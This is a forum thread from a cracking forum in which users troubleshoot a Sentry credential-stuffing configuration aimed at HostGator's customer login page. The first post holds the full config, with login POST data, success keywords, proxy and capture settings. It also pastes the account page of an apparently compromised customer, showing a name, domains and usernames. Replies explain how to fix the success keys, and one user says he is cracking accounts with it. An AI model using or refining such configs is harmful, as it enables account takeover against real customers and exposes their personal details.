Problem w/Form Redirect Keyword

Discussion in 'Cracking Discussions & Help Forum' started by Sublime, Sep 5, 2014.

  1. Sublime

    Sublime Banned

    Messages:
    2,001
    Likes:
    1,244
    Ratio:
    0.82
    Source of page I redirect to:
    Code:
    Select All
    <head profile="https://gmpg.org/xfn/11"> <meta http-equiv="Content-type" content="text/html;charset=UTF-8"> <link href="/css/styles.css" type="text/css" rel="stylesheet"> <title>HostGator Billing/Support System</title> <meta name="keywords" content=""> <meta name="description" content=""> <script src="/js/underscore.js"></script> <script type="text/javascript" src="/js/jquery.js"></script> <script src="/js/custom.js"></script> <script src="/js/jquery.validate.min.js"></script> <script type="text/javascript" src="/js/jquery.dataTables.min.js"></script> <script> $(document).ready(function () { $('input[name=amount]').attr('readonly', true); $(".domain").focus(function () { if ($(this).val() == "Enter Domain Here...") $(this).val(""); }); $(".domain").blur(function () { if ($(this).val() == "") $(this).val("Enter Domain Here..."); }); $("#domain_action_register, #domain_action_transfer, #downarrow").click(function(){ $("#domain_action_register, #domain_action_transfer").hide(); $("#dropdown").show() } ); $(".dropdownclick").click(function(){ if ($(this).text() == "Transfer") var id = "domain_action_transfer"; else var id = "domain_action_register"; $("#" + id + "_submit").show(); if ($(this).text() == "Transfer") $("#domain_action_register_submit").hide(); else $("#domain_action_transfer_submit").hide(); $("#dropdown").hide(); $("#"+id).show(); $(".textsubmit").text($(this).text()); }); } ); </script> </head> <!-- Begin GBclient (inside area) --> <body id="gbclient"> <debug class="viewBox-view_beta_tx"> <div id="betaBar" class="betaBar" style="overflow:hidden;height:36px;"> <!--USE THIS FOR LEGACY--> <div class="content-container"> <!-- <div class="beta-close">+</div> --> <p><span class="beta-text">The NEW <span class="beta-text-cp">Customer Portal</span> is now available!</span><span class="beta-text-try">Want to give it a try?<a href="https://portal.hostgator.com">Start using the NEW Customer Portal</a></span></p> </div> </div></debug><script type="text/javascript" id="script_view_beta_tx"> $(document).ready(function () { $.fn.slideLeft = function(speed,fn) { return $(this).animate({ 'width' : '0px' },speed || 400,function() { $.isFunction(fn) && fn.call(this); }); } $('.beta-close').on('click', function () { $('#betaBar').empty(); $('#betaBar').slideLeft(200, function () { $('#betaBar').hide(); }); window.localStorage.hideLegacyHeader = true; }); if ('hideLegacyHeader' in window.localStorage && window.localStorage.hideLegacyHeader) { $('#betaBar').hide(); } });</script><script>HGJS.debugPane.registerBoth('view_beta.tx');</script> <div class="clouds" style="background-position: -51px 0px;"> <div class="sky"> <div class="content"> <!-- Upper area with logo, support links, and social media icons --> <div class="topnav"> <div class="upper"> <!-- mw mods --> <a class="support-tab" href="http://support.hostgator.com" target="_blank">View Our Support Articles</a> <div class="socialbox"> <a href="http://facebook.com/hostgator/" target="_blank"><img src="/img/facebook2.png" title="Facebook"></a> <a href="http://twitter.com/hostgator/" target="_blank"><img src="/img/twitter2.png" title="Twitter"></a> </div> <!-- .topboxmid --> </div> <!-- .upper --> <div class="leftnav"> <img src="/img/fly3.gif" class="dragonfly1"> <a href="/" title="HostGator Web Hosting Blog"><img src="/img/snappy2.png" alt="Snappy" class="snappy3"></a> <div class="headings"> <a href="http://www.hostgator.com" title="Hostgator"><img src="/img/hgh1.png" alt="HostGator"></a> <h2 class="gotham">Billing/Support System</h2> </div> <!-- .headings --> </div> <!-- .leftnav --> <div class="rightnav"> <!-- /mw mods --> <img id="hostgatorsupport" src="/img/livechat.png" usemap="#hostgatorsupport" title=""> <map id="_hostgatorsupport" name="hostgatorsupport"> <area shape="rect" coords="331,2,424,82" href="#" onclick="window.open('http://chat.hostgator.com/', (Math.floor(Math.random()*100000)), 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=0,width=987,height=610,left = 310,top = 275');" alt="live chat" title="live chat"> </map> </div> <!-- .rightnav --> </div> <!-- .topnav --> <div class="lclr"></div> <!-- Navigation bar --> <div class="navigation"> <ul class="gothamhover"><li><a href="/" title="Home" class="homenav">Home</a></li><li class="navsep"></li><li class="welcome">Welcome agaba kabunga!</li><li><a href="/logout" title="Logout" class="logoutbtn">Logout</a></li></ul> </div> <!-- .navigation --> <div class="lclr"></div> <div class="topcorners"></div> <!-- .topcorners --> <div class="main"> <!-- Sidebar, left side --> <div class="sidebar"> <div class="sidesection"> <div class="sidebarheading gotham"><img src="/img/simg1.png" alt="" class="simg"><p>General Details</p></div> <!-- .sidebarheading --> <ul> <li class="s1"><a href="/" title="Account Overview (Home)">Account Overview (Home)</a></li><li class="s2"><a href="/edit_contact" title="Edit Contact Information">Edit Contact Information</a></li> <li class="s3"><a href="/edit_settings" title="Edit Account Settings">Edit Account Settings</a></li> <li class="s17"><a href="/password_change" title="Change My Password">Change My Password</a></li> <li class="s9"><a href="/notify_settings" title="Edit Email Settings">Edit Email Settings</a></li></ul> </div> <!-- .sidesection --> <div class="sidesection"> <div class="sidebarheading gotham"><img src="/img/simg2.png" alt="" class="simg spad"><p>Billing Details</p></div> <!-- .sidebarheading --> <ul> <li class="s4"><a href="/make_payment" title="Make a Payment">Make a Payment</a></li> <li class="s5"><a href="/billing_view_cards" title="Manage Credit Card(s)">Manage Credit Card(s)</a></li> <li class="s6"><a href="/billing_view_payment" title="View Payment History">View Payment History</a></li><li class="s7"><a href="/transactions" title="View Transaction Log">View Transaction Log</a></li><li class="s8"><a href="/billing_view_credits" title="Account Credits">Account Credits</a></li> <li class="s9"><a href="/subscriptions" title="Manage Subscriptions">Manage Subscriptions</a></li> <li class="s10"><a href="/billing_view_domains" title="View Domain Names">View Domain Names</a></li> </ul> </div> <!-- .sidesection --> <div class="sidesection"> <div class="sidebarheading gotham"> <img src="/img/simg3.png" alt="" class="simg spad"> <p>Support Tickets</p> </div> <!-- .sidebarheading --> <ul> <li class="s11"> <a href="/create_ticket" title="Create a Ticket">Create a Ticket</a> </li> <li class="s12"> <a href="/ticket_view" title="View All Past Tickets">View All Past Tickets</a> </li> <li class="s13"> <a href="/setup_account" title="Add an Email Address">Add an Email Address</a> </li> <li class="s14"> <a href="/remove_account" title="Remove an Email Address">Remove an Email Address</a> </li> </ul> </div> <!-- .sidesection --> <div class="sidesection"> <div class="sidebarheading gotham"><img src="/img/simg4.png" alt="" class="simg"><p>Hosting Packages</p></div> <!-- .sidebarheading --> <ul> <li class="s15"><a href="/packages_add" title="Add New Package">Add New Package</a></li> <li class="s16"><a href="/packages_view" title="View Hosting Packages">View Hosting Packages</a></li> </ul> </div> <!-- .sidesection --> <div class="sidesection"> <div class="sidebarheading gotham"> <img src="/img/simg5.png" alt="" class="simg spad"> <p>Contact Us</p> </div> <!-- .sidebarheading --> <div class="contacting"> <p class="bold">By Phone:</p> <p>1.866.964.2867</p> <p>1.713.574.5287</p> </div> <!--.contacting --> </div> <!-- .sidesection --> </div> <!-- .sidebar --> <!-- Main content area, right side --> <div class="rightside"> <div id="breadcrumb"> <h3> <a href="/">Home</a> <span class="req">»</span> <a href="/packages_view">View Hosting Packages</a> </h3></div><img src="/img/topdivide.jpg" alt="Divider"> <div class="paymenthistory"> <fieldset> <legend>Shared Hosting Packages</legend> <table id="invstats" class="extrabot info-table package-list" cellspacing="0" cellpadding="0"> <tbody><tr class="package-title"> <td class="secrowover bleft bright" colspan="2"> utanzania.com (SH-2197909) </td> </tr> <tr> <td class="secrowover bleft"><span class="bold">Username:</span> agabak </td> <td class="secrowover bright"><span class="bold">Server:</span> </td> </tr> <tr> <td class="secrowover bleft"><span class="bold">Plan:</span> Windows Enterprise </td> <td class="secrowover bright"><span class="bold">Price:</span> $19.95 every 1 month(s)</td> </tr> <tr> <td class="secrowover bleft"><span class="bold">Status:</span> Pending </td> <td class="secrowover bright"> <span class="bold">Renew date:</span> 2014-10-03 </td> </tr> <tr> <td class="secrowover bleft bright" colspan="2"> <span class="bold">Plesk Login:</span> <a href="https://:8443" style="color:#306010;font-weight:900;text-decoration:none;">https://:8443</a> </td> </tr> <tr class="package-bottom"><td colspan="2" class="bleft bright"></td></tr> <tr class="package-title"> <td class="secrowover bleft bright" colspan="2"> davaa.com (SH-647157) </td> </tr> <tr> <td class="secrowover bleft"><span class="bold">Username:</span> agaba </td> <td class="secrowover bright"><span class="bold">Server:</span> </td> </tr> <tr> <td class="secrowover bleft"><span class="bold">Plan:</span> Baby </td> <td class="secrowover bright"><span class="bold">Price:</span> $9.95 every 1 month(s)</td> </tr> <tr> <td class="secrowover bleft"><span class="bold">Status:</span> Cancelled </td> <td class="secrowover bright"> <span class="bold">Renew date:</span> 2008-02-02 </td> </tr> <tr> <td class="secrowover bleft bright" colspan="2"> <span class="bold">cPanel Login:</span> <a href="https://:2083" style="color:#306010;font-weight:900;text-decoration:none;">https://:2083</a> </td> </tr> <tr class="package-bottom"><td colspan="2" class="bleft bright"></td></tr> </tbody></table> </fieldset></div> <div class="paymenthistory"> <fieldset> <legend>Reseller Hosting Packages</legend> <table id="invstats" class="extrabot info-table package-list" cellspacing="0" cellpadding="0"> <tbody><tr class="package-title"> <td class="secrowover bleft bright" colspan="3"> ulweb.com (RS-89918) </td> </tr> <tr> <td class="secrowover bleft"><span class="bold">Username:</span> agaba </td> <td class="secrowover bright"><span class="bold">Server:</span> </td> </tr> <tr> <td class="secrowover bleft"><span class="bold">Plan:</span> Aluminum </td> <td class="secrowover bright"><span class="bold">Price:</span> $24.95 every 1 month(s)</td> </tr> <tr> <td class="secrowover bleft"><span class="bold">Status:</span> Cancelled </td> <td class="secrowover bright" colspan="3"> <span class="bold">Renew date:</span> 2007-08-11 </td> </tr> <tr> <td class="secrowover creditbot bleft bright" colspan="3"><span class="bold">WHM Login:</span> <a href="https://:2087" style="color:#306010;font-weight:900;text-decoration:none;">https://:2087</a> </td></tr> <tr class="package-bottom"><td colspan="3" class="bleft bright"></td></tr> </tbody></table> </fieldset></div> </div> <!-- .rightside --> <div class="clear"></div> </div> <!-- .main --> <div class="clear"></div> <!-- Footer area with copyright and Snappy sitting at Desk --> <div class="bottomcorners"> <p class="copyright">Copyright © 2013 <a href="http://hostgator.com" title="HostGator.com">HostGator.com LLC</a> Web Hosting</p> </div> <!-- .bottomcorners --> </div> <!-- .content --> </div> <!-- .sky --> </div> <!-- .clouds --> <div class="swampgrass"></div><!-- .swampgrass--> <div class="desk"> <!--<img src="/img/fly5.gif" class="dragonfly4" alt="" />--> <img src="/img/leftgrass.png" class="leftgrass" alt=""> <img src="/img/leftgrass2.png" class="leftgrass2" alt=""> <img src="/img/snappydesk.png" class="snappydesk" alt=""> </div> <!--.desk --> <div class="swamp" style="background-position: 89px 0px;"></div> <!-- .swamp --> <div class="water"></div> <!-- .water --> </body>
    I have the config working great, many hits. This is not my first config, I'm not total noob w/Sentry.
    My issue is that it will not capture any data I am trying to capture URL's, Package, & Plan Status like you see here:

    [​IMG]

    Here is the full config so you can test yourself, like I said it is working, I think the issue w/capture is the form redirect key... I have tried checking/unchecking "Follow Redirect" too. I'm out of idea please help!

    Config:
    Code:
    Select All
    [Wordlist]UserIndex=1PassIndex=2EmailIndex=020F242CCA14750F5B93E5A13223E2343=131261D92BCEAD09F8A7687851857389B829B9=0FD1CD6CCF181026E34198C8E73E55EFB=2155BA49F439560F29CDC1DA854B11328EE=182080E7CB2E415B5A3DE65668D970FB3335C=30[Settings]SiteURL=https://gbclient.hostgator.com/loginTimeout=10WaitBot=0ResolveHost=0ComboFilter=0UsernameStart=6UsernameEnd=8PasswordStart=6PasswordEnd=8ComboMode=0Letters=0Digits=0Alpha=0Email=0LowerUpper=0LetterDigit=0SpeciaChar=0PasswordLetters=0PasswordDigits=0PasswordAlpha=0PasswordEmail=0PasswordLowerUpper=0PasswordLetterDigit=0PasswordSpeciaChar=0EmailFilter=0EmailMode=0ProxyActivate=10ProxyRatio=4ProxyCombo=0WaitTime=5BanWindowWidth=1BanWindowProxies=10BanWindowRatio=10blnNoProxies=0RequestMethod=2Referer=2HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: https://gbclient.hostgator.com/login|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|POSTData=email=<USER>&password=<PASS>[Fake]AfterFP=0FollowRedirect=1EnableConHits=0Success=3ConHits=0EnableConLength=0SourceTags=1ConLength=-1blnSuccess=0SuccessRetries=3blnForbToOK=1ForbToOkLength=1000blnBadOcrCode=0BadOcrCodeRetries=3blnCompleteNot=1HTTPFollow=1blnProcessErrors=0blnInvalidPath=1UserField=0[Keywords]HeaderFail=HeaderSuccess=HeaderBan=HeaderRetry=SourceFail={"success":false}SourceSuccess={"success":true}SourceBan=SourceRetry=EnableHeaderFail=0EnableHeaderSuccess=0EnableHeaderBan=0EnableHeaderRetry=0EnableSourceFail=1EnableSourceSuccess=1EnableSourceBan=0EnableSourceRetry=0EnableGlobalSourceRetry=1[Form]IAParse=0blnBasic=0Action=https://gbclient.hostgator.com/loginUsername=emailPassword=passwordEmail=CustomData=NoIndex=AddData=Cookie=gbclient_session=43208397862148088536273933328503459IAction=-1IUser=-1IPass=-1IEmail=-2ICaptcha=-1ReqReferer=ReqCookie=AjaxURL=AjaxPOSTData=AjaxData=AjaxParsingCode=RefData=ParsingCode=FormRedirectUrl=https://gbclient.hostgator.com/packages_viewRedPostData=LoginPostData=RedKeys=<Source>||hostgatorDataDesc=Cracked by PorkSoda -- URL&Plan&StatusCaptureParsingCode==2>\n | (|#00|#00|0|#00|#00|0&n:</span> | <|#00|#00|0|#00|#00|0&s:</span> | |#00|#00|0|#00|#00|0RefreshSession=0RefreshCookie=1IAMethod=2POSTMethod=2RedMethod=1LoginMethod=1AjaxHeader=0FormHeader=0RedHeader=0LoginHeader=0ImageAfterAjax=0FollowRedirectsOnIA=0FollowRedirectsOnRed=1[Ajax]Variables=PostElements2=RedURL=[OCR]OCRMode=0URLMode=0ImageURLID=||Captcha=OCRKey=RefreshCaptcha=0blnContrast=0blnBrightness=0blnSaturation=0blnThreshold=0blnInvert=0blnNoise=0blnIsolate=0blnResize=0blnBorder=0blnCharExtract=0blnRemoveColors=0blnStringFilter=0blnLetter=1blnDigits=1blnBlur=0blnReconstruct=0blnLower=0blnUpper=0blnRemoveLines=0blnMultiChar=0blnPalette=0blnCharResize=0blnCharSubExtraction=0blnGif=0blnCompute=0blnBorderPre=0Contrast=0Brightness=0Saturation=0Threshold=0Noise=1Isolate=1Resize=2BorderLeft=0BorderTop=0BorderRight=0BorderBottom=0CharExtractMinBlack=0CharExtractMaxBlack=1CharExtractMinWidth=1CharRotateMax=0CharRotateSteps=5MinLength=1MaxLength=10BlurRadius=1CharExtractMaxWidth=33CharWidthMinBlack=2CharSpace=1Range=0InvertDensity=0InvertLength=20LineCurvatureMax=4LineWidthMax=13CharResize=1CharHeight=13GifStart=2GifOffset=2BorderLeftPre=0BorderTopPre=0BorderRightPre=0BorderBottomPre=0CharBorderH=5CharBorderV=5CharRotateBorder=5CharExtractMinHeight=1VerticalRejoin=30CharExclude=SpecialChars=Colors=Colors2=Lines=Min Length: 2, Max Width: 5, HorizzontalLanguage=eng
     
  2. ghaith123

    ghaith123 Banned

    Messages:
    296
    Likes:
    10
    Ratio:
    0.01
    open sesame !

    EDIT: yes i know the problem , you dont know how sentry works !

    just replace the keys in success key for the redirect key and redirect key for success key.

    try to understand why, if you wanna explanation, i'll be glad to.
     
  3. Sublime

    Sublime Banned

    Messages:
    2,001
    Likes:
    1,244
    Ratio:
    0.82
    I'll try that now, I got those keywords from httpfox. I would love explanation, I like learning

    EDIT: I try that, and it no find success key, so no hits now.... Have tried other keywords from source such as logout ect....
     
  4. ghaith123

    ghaith123 Banned

    Messages:
    296
    Likes:
    10
    Ratio:
    0.01
    i got interested in the website , i start cracking it, few hits many suspended\expired.

    it should work just change success key with redirect and redirect for success, simple.

    [​IMG]
     
    Sublime likes this.
  5. Sublime

    Sublime Banned

    Messages:
    2,001
    Likes:
    1,244
    Ratio:
    0.82
    I will try that now again. Thanks!
     
  6. Sublime

    Sublime Banned

    Messages:
    2,001
    Likes:
    1,244
    Ratio:
    0.82
    Now they all hits go to check for me???

    (Running small list of all hits)
     
    Samine likes this.
  7. ghaith123

    ghaith123 Banned

    Messages:
    296
    Likes:
    10
    Ratio:
    0.01
    set proper success key, right click on any check hit , then view source whether in notepad or in browser and set proper success key.
     

Share This Page